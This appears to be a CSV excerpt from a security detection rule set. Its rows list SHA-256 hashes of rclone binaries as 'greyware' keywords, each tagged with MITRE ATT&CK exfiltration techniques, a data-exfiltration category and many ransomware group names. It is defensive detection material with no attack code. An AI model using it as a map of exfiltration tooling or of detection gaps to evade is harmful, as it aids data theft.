"*8e0c49fad69525d1219415d2f0651fd243ddf02291fd95e91d2b074d4858c31f*",".{0,1000}8e0c49fad69525d1219415d2f0651fd243ddf02291fd95e91d2b074d4858c31f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8e1229aa0b2e52959717025d100a4884d531c280c29f02d67ee09d1cadbc3450*",".{0,1000}8e1229aa0b2e52959717025d100a4884d531c280c29f02d67ee09d1cadbc3450.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8e24ddb5034a5040734272416b8b504a547967cbddb203a44990570e3996ba7a*",".{0,1000}8e24ddb5034a5040734272416b8b504a547967cbddb203a44990570e3996ba7a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8e325e200b07f05667d65277b96f3c3acd02f54466a3ffbda27a5f4ec5fb8776*",".{0,1000}8e325e200b07f05667d65277b96f3c3acd02f54466a3ffbda27a5f4ec5fb8776.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8e3342af739a94b7574d90e940bd22d5d81cf45739c73dc5f9b3060d8cb20360*",".{0,1000}8e3342af739a94b7574d90e940bd22d5d81cf45739c73dc5f9b3060d8cb20360.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8e4e8c65009ee13aec866c4f188e8c1db49eb1b88ecad222abfe2a1249d629a6*",".{0,1000}8e4e8c65009ee13aec866c4f188e8c1db49eb1b88ecad222abfe2a1249d629a6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8e8bb13fb0d7beb316487ecde8ead5426784cdcdbf8b4d8dd381c6fe8c7d92a0*",".{0,1000}8e8bb13fb0d7beb316487ecde8ead5426784cdcdbf8b4d8dd381c6fe8c7d92a0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8f73adfa8bd478c3cb11768d32d7578fd57eaaa3f1d72458f008aee959c95dd9*",".{0,1000}8f73adfa8bd478c3cb11768d32d7578fd57eaaa3f1d72458f008aee959c95dd9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8f776a7b5ddd0bde673a03e6bdd55274e6e2e3766df080e7c6b5effe9cb95e4c*",".{0,1000}8f776a7b5ddd0bde673a03e6bdd55274e6e2e3766df080e7c6b5effe9cb95e4c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8fbd69db6654ae517ffe8cc2d2750d41b4507f840fe928a5f5f3b6003b85fc5d*",".{0,1000}8fbd69db6654ae517ffe8cc2d2750d41b4507f840fe928a5f5f3b6003b85fc5d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*904b906cc465dd679a00487497e3891d33fca6b6e25c184400bccfb248344f39*",".{0,1000}904b906cc465dd679a00487497e3891d33fca6b6e25c184400bccfb248344f39.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9061caad3082f4d275d90f2975ef120fb71f6537ed88d08db1a3b5404db5ae49*",".{0,1000}9061caad3082f4d275d90f2975ef120fb71f6537ed88d08db1a3b5404db5ae49.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*907fa204febdb90eb266bb824eea4e81ebeb3257eabc1c127b8dd17882c4ea8d*",".{0,1000}907fa204febdb90eb266bb824eea4e81ebeb3257eabc1c127b8dd17882c4ea8d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*90bd1055ada3023d8d6ffbf9d1458bb71817c51e152b004afa51ebb1d812b2f9*",".{0,1000}90bd1055ada3023d8d6ffbf9d1458bb71817c51e152b004afa51ebb1d812b2f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*91402feaab59a5c836e1f2a5ee6f0eb3569bc63cd6f8c374693fc9b76bc8ff05*",".{0,1000}91402feaab59a5c836e1f2a5ee6f0eb3569bc63cd6f8c374693fc9b76bc8ff05.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*914948948e8f1914d9292ebdc18b3cd876bc6acc9177eedbd8908a03d12c73aa*",".{0,1000}914948948e8f1914d9292ebdc18b3cd876bc6acc9177eedbd8908a03d12c73aa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9183f495b28acb12c872175c6af1f6ba8ca677650cb9d2774caefea273294c8a*",".{0,1000}9183f495b28acb12c872175c6af1f6ba8ca677650cb9d2774caefea273294c8a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*91a81f86738737dbda68c20ba8622121302ca0b81b7a9f926fd04aa13607fef5*",".{0,1000}91a81f86738737dbda68c20ba8622121302ca0b81b7a9f926fd04aa13607fef5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*91d383deb3cd0128ba1237af0173f0c1a90255aab5d03b8f2be1e454cfb243ae*",".{0,1000}91d383deb3cd0128ba1237af0173f0c1a90255aab5d03b8f2be1e454cfb243ae.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*91e79ff8d9ef358c1f73113ae2f280d4fe73302a2d2871f1c13430ea9fd96157*",".{0,1000}91e79ff8d9ef358c1f73113ae2f280d4fe73302a2d2871f1c13430ea9fd96157.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*926cd10478e0da5ccfa5dcc0bd04701f4107d50e8cc6c33f665a62e9543504e8*",".{0,1000}926cd10478e0da5ccfa5dcc0bd04701f4107d50e8cc6c33f665a62e9543504e8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9275bf1e2cdc8a8c9c3bb6a1c808d64e55e03493194792503c2119fd5c8e7345*",".{0,1000}9275bf1e2cdc8a8c9c3bb6a1c808d64e55e03493194792503c2119fd5c8e7345.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*92ceaf15be171e0e426f88ecb0fb5e13e27817c4c4126ce1452dc09940e3ac27*",".{0,1000}92ceaf15be171e0e426f88ecb0fb5e13e27817c4c4126ce1452dc09940e3ac27.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*92db559fbecc1fa2cc3bd5ed4c34c7f4e65fcf5fcb9186d1c8403a503f025c4f*",".{0,1000}92db559fbecc1fa2cc3bd5ed4c34c7f4e65fcf5fcb9186d1c8403a503f025c4f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*932b8b4b1eb134c644a3edb0536db25a65e9c703d61f28f7efff5fa13de1d8e8*",".{0,1000}932b8b4b1eb134c644a3edb0536db25a65e9c703d61f28f7efff5fa13de1d8e8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*932e8b9e1041cc300cbfa5f6203d906d8ce93974f88054af515024d32c29d0ba*",".{0,1000}932e8b9e1041cc300cbfa5f6203d906d8ce93974f88054af515024d32c29d0ba.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*93ac87327b298ef599f47868fa285215cf574671b421c9759ba0f966908320ac*",".{0,1000}93ac87327b298ef599f47868fa285215cf574671b421c9759ba0f966908320ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*94946b5d24521ce4b32bc67219ea8d24c930c8a65c1723a39478959ab1a909df*",".{0,1000}94946b5d24521ce4b32bc67219ea8d24c930c8a65c1723a39478959ab1a909df.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*94c211a1a14f81bdc2ec004ff3a433ad860520c731ac54ddf38435e2512cba4b*",".{0,1000}94c211a1a14f81bdc2ec004ff3a433ad860520c731ac54ddf38435e2512cba4b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*94c231beaa3b89d98562c264ce1038e346dd68a46abefe80c5ec4e095317303f*",".{0,1000}94c231beaa3b89d98562c264ce1038e346dd68a46abefe80c5ec4e095317303f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*94cab34fa8eb8eb60a16b06fcd22263098de0309791aab44f9f5b0a42e584a46*",".{0,1000}94cab34fa8eb8eb60a16b06fcd22263098de0309791aab44f9f5b0a42e584a46.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*94cf1f7fafa3445476831a500cd9ee9cac37ee7b405e6c7f99ee2d5cfe841168*",".{0,1000}94cf1f7fafa3445476831a500cd9ee9cac37ee7b405e6c7f99ee2d5cfe841168.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*94fd39762f3351b03852fcb6e6c28e5ee0a98eb27fae35feeb65997ebc9c26f0*",".{0,1000}94fd39762f3351b03852fcb6e6c28e5ee0a98eb27fae35feeb65997ebc9c26f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*951507c02248df0f93ee0282da390673a32188c3d3e4c48b0800f2742f19da8f*",".{0,1000}951507c02248df0f93ee0282da390673a32188c3d3e4c48b0800f2742f19da8f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*95305891495b6d7a676bd0500e4aa921a1297278eee4c957a5b0c4e18018ac30*",".{0,1000}95305891495b6d7a676bd0500e4aa921a1297278eee4c957a5b0c4e18018ac30.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*9535fa6343e5fdf4456b753f662e952cba63f52633a351e52ef2c550e7353fbe*",".{0,1000}9535fa6343e5fdf4456b753f662e952cba63f52633a351e52ef2c550e7353fbe.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
